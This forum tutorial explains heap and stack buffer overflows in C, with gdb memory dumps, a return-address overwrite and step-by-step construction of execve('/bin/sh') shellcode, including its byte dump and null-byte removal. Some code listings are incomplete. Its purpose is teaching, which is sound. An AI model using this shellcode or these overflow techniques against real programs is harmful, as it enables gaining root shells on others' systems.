I will try to explain, as simply as possible, what a buffer overflow is and how you can detect whether a program is vulnerable to buffer overflow exploits.
This thread has C source code, so if you don't know C you may have some problems. You also need some knowledge of ASM and of how to use gdb.
Well, everyone knows what an exploit is, but for the ones that don't: an exploit is a program, usually written in C, that takes advantage of some problem in another program. The exploit lets you run arbitrary code, so you can do something that you shouldn't be able to do with your normal privileges on the system.
Nowadays, most exploits are what we call Buffer Overflow Exploits, and they can be local or remote.
Everyone knows how to use them (how do you think most websites get defaced?), but the problem is that many people don't know how to spot a vulnerability in the source code, or, even if they can, they aren't able to write an exploit for it.
Buffer Overflow?
A buffer overflow is a problem in the memory where a program stores its data. A buffer overflow writes past the end of a buffer and overwrites specific memory locations next to it; if you put something of your choice there, you can make the program do what you want.
Let's follow a program, find the buffer overflow in it, and then fix it.
------ Partial code below--------
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
char *somevar;
char *important;
somevar = (char *)malloc(sizeof(char)*4);
important = (char *)malloc(sizeof(char)*14);
strcpy(important, "command"); /* This one is the important variable */
strcpy(somevar, argv[1]);
..... Code here ....
.... Other functions here ....
------- End Of Partial Code ------
So let's say that the important variable stores some system command, let's say "chmod o-r file", and since that file is owned by root, the program runs as the root user too. This means that if you can send commands to it, you can execute ANY system command. So you start thinking: how the hell can I put something that I want in the important variable? Well, the way is to overflow the memory until we reach it. But first let's look at the variables' memory addresses.
To do that you need to modify the code: we added 2 lines to the source code and left the rest unchanged. Let's see what those two lines do.
The printf("%p\n%p", somevar, important); line prints the memory addresses of the somevar and important variables. The exit(0); line stops the program right there, so the rest of it never runs.
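The modified program itself isn't shown here. As a hedged sketch only, assuming a C compiler and the standard malloc(), the hypothetical function show_heap_layout() below does the same job as those two lines: it allocates 4 and 14 bytes as in the example, prints both addresses and returns the distance between them. The addresses and the distance depend on your allocator and platform, so treat the result as something to inspect, not a fixed value.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: allocates 4 and 14 bytes like the example,
 * prints both addresses and returns how far apart they are, in bytes.
 * The result depends on the malloc() implementation and platform. */
long show_heap_layout(void)
{
    char *somevar = malloc(4);
    char *important = malloc(14);
    long gap = 0;

    if (somevar != NULL && important != NULL) {
        printf("%p\n%p\n", (void *)somevar, (void *)important);
        /* Subtracting pointers into two different blocks is undefined
         * in C, so compare them as integers instead. */
        gap = (long)((intptr_t)important - (intptr_t)somevar);
    }
    free(important);
    free(somevar);
    return gap;
}
```

Call it from main() and compare the printed distance with the 0x10 (16 byte) gap in the output below.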
After running the program you would get output like the following (you will probably not get the same memory addresses):
0x8049700 <----- This is the address of somevar
0x8049710 <----- This is the address of important
As we can see, the important variable comes right after somevar (0x8049710 - 0x8049700 = 0x10, so 16 bytes later), and this lets us use our buffer overflow skills, since somevar is filled from argv[1]. Now we know that one follows the other, but let's check each memory address so we have a precise idea of how the data is stored. To do this, let's re-write the code again.
-------- Partial code ---------
int main(int argc, char **argv) {
char *somevar;
char *important;
char *temp; /* will need another variable */
/* rest of code here */
------ End Of partial Code ------
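The loop that prints the listing below isn't shown either. Here is a minimal sketch of such a dumper, under the assumption that you only want to look at memory you actually own: the hypothetical dump_bytes() prints one line per byte (address, character, hex value) and only reads inside the buffer it is given. The author's listing also shows, in parentheses, 4 bytes read as an int starting at each address; this sketch prints a single byte instead. Reading past the end of a malloc()ed block, as the original listing does, is undefined behaviour in C, so this sketch sticks to a buffer of known size.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: prints "address: char (hex)" for each byte of
 * buf[0..n), like the listing below, and reads nothing outside it.
 * Returns the number of printable characters found. */
size_t dump_bytes(const unsigned char *buf, size_t n)
{
    size_t printable = 0;

    for (size_t i = 0; i < n; i++) {
        int c = buf[i];
        int shown = isprint(c) ? c : ' ';

        if (isprint(c))
            printable++;
        printf("%p: %c (0x%02x)\n", (const void *)(buf + i), shown, c);
    }
    return printable;
}
```

For example, with unsigned char buf[8] = "send"; the call dump_bytes(buf, sizeof buf) prints the four letters of send followed by four 0x00 bytes.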
Now let's say that in normal use argv[1] should be send. So you just type at your prompt:
$ program_name send
You'll get an output like this:
Starting To Print memory address:
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61) <---- each of these lines represents one memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d)
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
You can now see that there are 12 bytes between the end of somevar and the start of important (0x8049704 through 0x804970f, since 0x8049710 - 0x8049704 = 12). So let's say that you run the program with a command line like:
$ program_name send------------newcommand
You'll get an output like this:
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706: - (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- memory address where important variable starts
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
newcommand has overwritten command. Now the program does something you want, instead of what it was supposed to do.
NOTE: Remember that sometimes the space between somevar and important holds other data (other variables, or the allocator's own bookkeeping, like the 0x19 at 0x804970c above) instead of being empty. Check those values and write the same values back at the same addresses, or the program can crash before it gets to the variable that you modified.
Why does this happen? As you can see in the source code, somevar is allocated before important, so most of the time somevar ends up first in memory. Now let's check how each one gets its value. Both are filled with strcpy(): important gets the constant "command", and somevar gets argv[1], and strcpy() never checks whether argv[1] fits in somevar's 4 bytes. The real problem is that important is assigned first, so when you then copy into somevar, which sits before important, important can be overwritten.
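This program could be patched against this particular overflow by switching those two lines, so that somevar is filled first and important is written afterwards, overwriting anything that spilled into it.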
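Switching the lines keeps important intact, but argv[1] is still copied past the end of somevar's 4 bytes (and over the allocator data between the two blocks). A more robust fix is to check the length before copying. A minimal sketch, assuming you are free to change the copy; copy_checked() is a hypothetical name, not a standard function:

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copy src into dst only if it fits, terminator
 * included. Returns 0 on success, or -1 and leaves dst untouched. */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len = strlen(src);

    if (len >= dstsize)   /* also rejects dstsize == 0 */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}
```

In the example this could be used as if (argc < 2 || copy_checked(somevar, 4, argv[1]) != 0) exit(1); in place of strcpy(somevar, argv[1]);. Note that even the normal input send is rejected: with its '\0' it needs 5 bytes, one more than the 4 allocated for somevar, so the buffer should be made bigger as well.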
This kind of buffer overflow is a heap buffer overflow. They are really easy to do in theory, but in the real world they are not so easy to pull off; after all, the example I gave was a really dumb one.
It's a real pain to find those important variables, and to overflow one you also need to be able to write to a variable at a lower memory address. Most of the time all these conditions don't come together, and that's why we are now going to talk about stack buffer overflows.
In the last paragraph I talked about the heap and the stack, so here's a brief, easy to understand definition of each one:
heap - the memory that a program reserves for data at run time (you use the heap when you call the malloc() function).
stack - the place where function arguments, local variables and return addresses are pushed when a function is called, and popped when it returns. When you are trying to overflow the stack, you try to change the return address, making the code jump to some place in memory where you have put the commands that you want to execute.
So let's get into the stack. Here you will need to know ASM and how to handle gdb.
We will talk about Smashing the Stack, an "attack" that changes the return address (RET). By doing this you can make the function return to an address where you have already placed some commands that you want to execute.
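To see what RET actually is, here is a small sketch that relies on __builtin_return_address(0), a GCC/Clang builtin (not standard C, so this assumes one of those compilers). Inside a function it gives the return address that the caller's call instruction saved on the stack, which is the value a stack smashing attack overwrites. saved_return_address() is a hypothetical name.

```c
#include <stdio.h>

/* Hypothetical helper. __builtin_return_address(0) is a GCC/Clang
 * builtin (not standard C): it yields the return address that the
 * caller's call instruction pushed on the stack, i.e. RET.
 * noinline keeps this a real call so that there is a RET to look at. */
__attribute__((noinline)) void *saved_return_address(void)
{
    void *ret = __builtin_return_address(0);

    printf("this call will return to %p\n", ret);
    return ret;
}
```

Calling it from two different lines of main() prints two different addresses, because each call returns to the instruction right after itself.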
Now we will try to make the exploit() function run twice.
Well first we need to find some addresses. This time let's use gdb.
First we need to compile the program.
$ gcc stack.c -o stack
$ gdb stack
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details.
This is your prompt. Now we will disassemble main; to do this, just type disassemble main (disas for short):
(gdb) disas main
Dump of assembler code for function main:
0x8048440 <main>: push %ebp
0x8048441 <main+1>: mov %esp,%ebp
0x8048443 <main+3>: mov 0xc(%ebp),%eax
0x8048446 <main+6>: add $0x4,%eax
0x8048449 <main+9>: mov (%eax),%edx
0x804844b <main+11>: push %edx
0x804844c <main+12>: call 0x8048410 <exploit>
0x8048451 <main+17>: add $0x4,%esp
0x8048454 <main+20>: mov %ebp,%esp
0x8048456 <main+22>: pop %ebp
0x8048457 <main+23>: ret
End of assembler dump.
As we can see, exploit is called at 0x804844c, and the function itself starts at 0x8048410.
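The relationship between those numbers can be checked by hand. On 32-bit x86, call 0x8048410 is encoded as the opcode 0xe8 followed by a 4-byte offset relative to the next instruction, so the instruction is 5 bytes long and the RET it pushes is the address right after it: 0x804844c + 5 = 0x8048451, which is the add $0x4,%esp line at main+17. The offset -0x41 used below is computed from the dump (0x8048410 - 0x8048451), not read from it. A hedged sketch, with hypothetical function names:

```c
#include <stdint.h>

/* "call rel32" on 32-bit x86: opcode 0xe8 plus a 4-byte offset. */
#define CALL_REL32_LEN 5u

/* Hypothetical helper: the address a call at call_addr pushes as RET,
 * i.e. the address of the instruction right after the call. */
uint32_t call_return_address(uint32_t call_addr)
{
    return call_addr + CALL_REL32_LEN;
}

/* Hypothetical helper: where that call jumps to. The offset is counted
 * from the next instruction, not from the call itself. Unsigned
 * arithmetic wraps modulo 2^32, so negative offsets work too. */
uint32_t call_target(uint32_t call_addr, int32_t rel)
{
    return call_return_address(call_addr) + (uint32_t)rel;
}
```

call_return_address(0x804844c) gives 0x8048451, and call_target(0x804844c, -0x41) gives 0x8048410.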
First, you are probably wondering what the x/3bc command is. Well, this is the command that lets us examine memory:
x/3bc
  3 - how many units to show (the range)
  b - the unit size: bytes
  c - the format: print them as chars
(For more info, type help x at the gdb prompt.)
I did it because I was wondering what was being pushed onto the stack at 0x80484bc, and as you can see it is the string we want to print.
Our goal now is to make exploit return to exploit again instead of returning to main. The first sign that we can probably exploit the C code is the segmentation fault we get when we give it a huge string; well, not that huge, probably aaaaaaaaaaaaaaaaaaaa would do :) check for yourself (hint: try 20). So to do that we need to change RET (the return address), and now you're thinking of a line that you saw in gdb:
0x804844c <main+12>: call 0x8048410 <exploit>
In this important line we have 2 addresses. You need to use 0x804844c, because it's the one that holds the call to exploit; if you used 0x8048410 we wouldn't get anything, since we would be pointing to
Doing this rewrites the return address with 0x0804844c, so the function returns to the call to exploit again. This puts us in an endless loop.
Shell code
Now I will talk about shell code. Shell code is a char array that consists of machine instructions used to spawn a shell.
Since the program we are trying to exploit doesn't have code that executes a shell, we must write it ourselves.
For this, you must know a little assembly, C and x86 architecture.
1. Shell code
Shell code is usually written in a program in one of two ways:
1) char c0de[]={0x90,0x90...};
2) char c0de[]="\x90\x90...";
Both are correct, so you can use either :))
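A quick way to convince yourself that both notations produce the same bytes. This sketch uses the seven bytes of "/bin/sh" that appear later in the dump instead of 0x90, because 0x90 does not fit in a signed char and compilers may warn about it (use unsigned char for arrays with bytes above 0x7f). The names as_array, as_string and notations_match() are hypothetical. One difference matters for shell code: the string literal carries an extra terminating '\0', so it is one byte longer.

```c
#include <string.h>

/* Hypothetical example: the bytes of "/bin/sh" in both notations. */
static const char as_array[]  = {0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68};
static const char as_string[] = "\x2f\x62\x69\x6e\x2f\x73\x68";

/* Returns 1 when both arrays start with the same 7 bytes and the string
 * form is exactly one byte longer (its terminating '\0'). */
int notations_match(void)
{
    return sizeof as_string == sizeof as_array + 1 &&
           memcmp(as_array, as_string, sizeof as_array) == 0 &&
           strcmp(as_string, "/bin/sh") == 0;
}
```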
2. Starting with shell c0de...
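------- shell.cpp Code Starts Here ----------
#include <unistd.h> /* execve(), NULL */
int main(){
char *sh[2];
sh[0]=(char *)"/bin/sh"; sh[1]=NULL;
execve(sh[0], sh, NULL);
}
------- shell.cpp Code Ends Here ----------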
Let's compile this with the -static option (so that the C library's execve code is linked into the binary and we can disassemble it) and run it in gdb.
root@zxtech#cc shell.cpp -o shell -static
root@zxtech#gdb shell
(gdb) disass execve
Dump of assembler code for function __execve:
0x804ea70 <__execve>: push %ebx
0x804ea71 <__execve+1>: mov 0x10(%esp,1),%edx
0x804ea75 <__execve+5>: mov 0xc(%esp,1),%ecx
0x804ea79 <__execve+9>: mov 0x8(%esp,1),%ebx
0x804ea7d <__execve+13>: mov $0xb,%eax
0x804ea82 <__execve+18>: int $0x80
0x804ea84 <__execve+20>: pop %ebx
0x804ea85 <__execve+21>: cmp $0xfffff001,%eax
0x804ea8a <__execve+26>: jae 0x804ee40 <__syscall_error>
0x804ea90 <__execve+32>: ret
End of assembler dump.
(gdb) quit
Well, let's look at main first, since everything starts there.
main -> push %ebp
main+1 ->movl %esp,%ebp
This is the standard prologue of every function: first save %ebp, then move %esp into %ebp, making %ebp the new frame pointer.
main+3 -> sub $0x8,%esp
subtract 0x8 from %esp because 2 char pointers take 8 bytes, 2*4=8 :))
main+6 -> movl 0x8073768,0xfffffff8(%ebp)
same as sh[0]="/bin/sh";
main+13 -> movl $0x0,0xfffffffc(%ebp)
same as sh[1]=NULL;
main+20 -> pushl $0x0
the call to execve starts here: the function's arguments are pushed onto the stack in reverse order, last argument first (the x86 stack grows downward), so the 3rd argument, NULL, goes first.
main+22 -> lea 0xfffffff8(%ebp),%eax
lea is "load effective address": we load the address of sh, the array of pointers, into %eax
main+25 -> pushl %eax
we push that address onto the stack as the 2nd argument (sh)
main+26 -> movl 0xfffffff8(%ebp),%eax ...
0xfffffff8(%ebp) holds the address of "/bin/sh" (look at main+6); we load it and push it onto the stack as the 1st argument, sh[0]
Now let's take a look at the execve function
__execve+1 mov 0x10(%esp,1),%edx
%edx gets the 3rd argument (NULL was the 3rd argument); the offsets are 4 bytes larger than usual because of the push %ebx just before
__execve+5 mov 0xc(%esp,1),%ecx
%ecx gets the address of sh (sh was the 2nd argument)
__execve+9 mov 0x8(%esp,1),%ebx
%ebx gets the address of "/bin/sh" (sh[0], the 1st argument)
__execve+13 mov $0xb,%eax
0xb is the system call number of execve
__execve+18 int $0x80
switch to kernel mode
Things to do->
We must have address of NULL in %edx
We must have address of sh in %ecx
We must have address of "/bin/sh" in %ebx
We must have 0xb in %eax
We must call int $0x80
Well, we need the exact address in memory of our "/bin/sh" string. We can simply put "/bin/sh" right after a call instruction: call pushes EIP (the address of the next instruction) onto the stack, and that pushed EIP will be the address of our string.
At the beginning of the code we put a JMP instruction that jumps to the call; the call saves EIP and goes to the offset of a. The saved EIP will be our "/bin/sh" address.
a-stands for code
J-stands for JMP
C-stands for CALL
s-stands for "/bin/sh"
Well, let's write this in asm:
------------ shell1.cpp Code Starts Here ----------------
int main(){
__asm__("jmp 0x1e \n" //jmp to call
"popl %esi \n" //get saved EIP into %esi, now we have the /bin/sh address
"movl %esi,0x8(%esi) \n" //address of sh right after /bin/sh
"movl $0x0,0xc(%esi) \n" //NULL as 3rd argument goes after the sh address
"movb $0x0,0x7(%esi) \n" //terminate /bin/sh with '\0'
"movl %esi,%ebx \n" //address of sh[0] in %ebx
"leal 0x8(%esi),%ecx \n" //address of sh in %ecx (2nd argument)
"leal 0xc(%esi),%edx \n" //address of NULL in %edx (3rd argument)
"movl $0xb,%eax \n" //system call number of execve in %eax
" int $0x80 \n" //switch to kernel mode
" call -0x23 \n" //call back to popl %esi
" .string \"/bin/sh\" \n"); //our string
}
------------ shell1.cpp Code Ends Here ----------------
Let's compile this
root@zxtech#cc shell1.cpp -o shell1
root@zxtech#gdb shell1
(gdb) x/bx main+3 <------- jmp starts here
0x8048733 <main+3>: 0xeb
0x8048734 <main+4>: 0x1e
0x8048735 <main+5>: 0x5e
0x8048736 <main+6>: 0x89
0x8048737 <main+7>: 0x76
0x8048738 <main+8>: 0x08
0x8048739 <main+9>: 0xc6
0x804873a <main+10>: 0x46
0x804873b <main+11>: 0x07
0x804873c <main+12>: 0x00
0x804873d <main+13>: 0xc7
0x804873e <main+14>: 0x46
0x804873f <main+15>: 0x0c
0x8048740 <main+16>: 0x00
0x8048741 <main+17>: 0x00
0x8048742 <main+18>: 0x00
0x8048743 <main+19>: 0x00
0x8048744 <main+20>: 0x89
0x8048745 <main+21>: 0xf3
0x8048746 <main+22>: 0x8d
0x8048747 <main+23>: 0x4e
0x8048748 <main+24>: 0x08
0x8048749 <main+25>: 0x8d
0x804874a <main+26>: 0x56
0x804874b <main+27>: 0x0c
0x804874c <main+28>: 0xb8
0x804874d <main+29>: 0x0b
0x804874e <main+30>: 0x00
0x804874f <main+31>: 0x00
0x8048750 <main+32>: 0x00
0x8048751 <main+33>: 0xcd
0x8048752 <main+34>: 0x80
0x8048753 <main+35>: 0xe8
0x8048754 <main+36>: 0xdd
0x8048755 <main+37>: 0xff
0x8048756 <main+38>: 0xff
0x8048757 <main+39>: 0xff
0x8048758 <main+40>: 0x2f
0x8048759 <main+41>: 0x62
0x804875a <main+42>: 0x69
0x804875b <main+43>: 0x6e
0x804875c <main+44>: 0x2f
0x804875d <main+45>: 0x73
0x804875e <main+46>: 0x68 <--------- code ends here
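You can check the JMP/CALL trick against this dump. The jmp at main+3 is the 2-byte short form (0xeb, then a signed 1-byte offset 0x1e); the call at main+35 is 0xe8 followed by the little-endian offset dd ff ff ff, which is -0x23. Both offsets are relative to the next instruction. The sketch below (function names hypothetical) decodes them: the jmp lands on the call at 0x8048753 (main+35), the call lands on popl %esi at 0x8048735 (main+5), and the address the call pushes is 0x8048758 (main+40), the first byte of "/bin/sh" (0x2f).

```c
#include <stdint.h>

/* Hypothetical helper: decode the little-endian signed 32-bit offset
 * stored after the 0xe8 opcode of "call rel32". */
int32_t read_rel32_le(const unsigned char *p)
{
    uint32_t v = (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
                 ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);

    /* Portable two's-complement conversion for values above INT32_MAX. */
    if (v & 0x80000000u)
        return -(int32_t)(~v) - 1;
    return (int32_t)v;
}

/* Hypothetical helper: target of a 2-byte short jmp (0xeb rel8) at addr. */
uint32_t short_jmp_target(uint32_t addr, int8_t rel8)
{
    return addr + 2u + (uint32_t)(int32_t)rel8;
}

/* Hypothetical helper: target of a 5-byte call (0xe8 rel32) at addr.
 * addr + 5 is the value the call pushes on the stack. */
uint32_t call_rel32_target(uint32_t addr, int32_t rel32)
{
    return addr + 5u + (uint32_t)rel32;
}
```

short_jmp_target(0x8048733, 0x1e) gives 0x8048753, and call_rel32_target(0x8048753, -0x23) gives 0x8048735.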
--------------- shell2.cpp Code Starts Here ------------------
int main(){
char buf[5];
long *ret=(long *)(buf+12);
--------------- shell2.cpp Code Ends Here ------------------
root@zxtech#cc shell2.cpp -o shell2
Writing "\x2f\x62\x69\x6e\x2f\x73\x68" is the same as writing "/bin/sh" (these are the last bytes of the code).
Take a look at this shell code... there are \x00 ('\0') bytes in some places. As we know, '\0' marks the end of a string, so strcpy() and the other string functions stop copying when they find a '\0', and our shell code wouldn't be copied completely.
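To see exactly where the copy would stop, this sketch (function name hypothetical) scans a byte array for the first 0x00 with memchr(), and the check uses the first 12 bytes of the dump above, from main+3 to main+14. The first 0x00 is at offset 9 (main+12, the 0x00 operand of movb $0x0,0x7(%esi)), so strcpy() would copy only the first 9 bytes plus the terminator.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: offset of the first 0x00 byte in buf[0..n),
 * or n if there is none. strcpy() stops copying at that offset. */
size_t first_nul(const unsigned char *buf, size_t n)
{
    const unsigned char *p = memchr(buf, 0x00, n);

    return p != NULL ? (size_t)(p - buf) : n;
}
```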
Let's get rid of these '\0' bytes:
change this                  for this
                             xorl %eax,%eax       (new line: sets %eax to 0)
movb $0x0,0x7(%esi)          movb %al,0x7(%esi)
movl $0x0,0xc(%esi)          movl %eax,0xc(%esi)
movl $0xb,%eax               movb $0xb,%al
...and if you want to read the entire explanation of buffer overflows, explained (for those of you who don't know C) in a manner that you can understand, check out Aleph One's "Smashing the Stack for Fun and Profit". http://www.cse.ogi.edu/DISC/projects...rd/profit.html
Jason Parker - http://www.o-negative.net
o-Negative: Information Network
::shrug:: I guess. I've just realized that most people wouldn't understand bounds checking on character arrays and the problems that come up when it's not done.
Not to mention that a lot of the people who frequent this list don't know how to use a debugger. Oh well.. I guess that is why we're here to discuss. Heh.. Pretty good post though..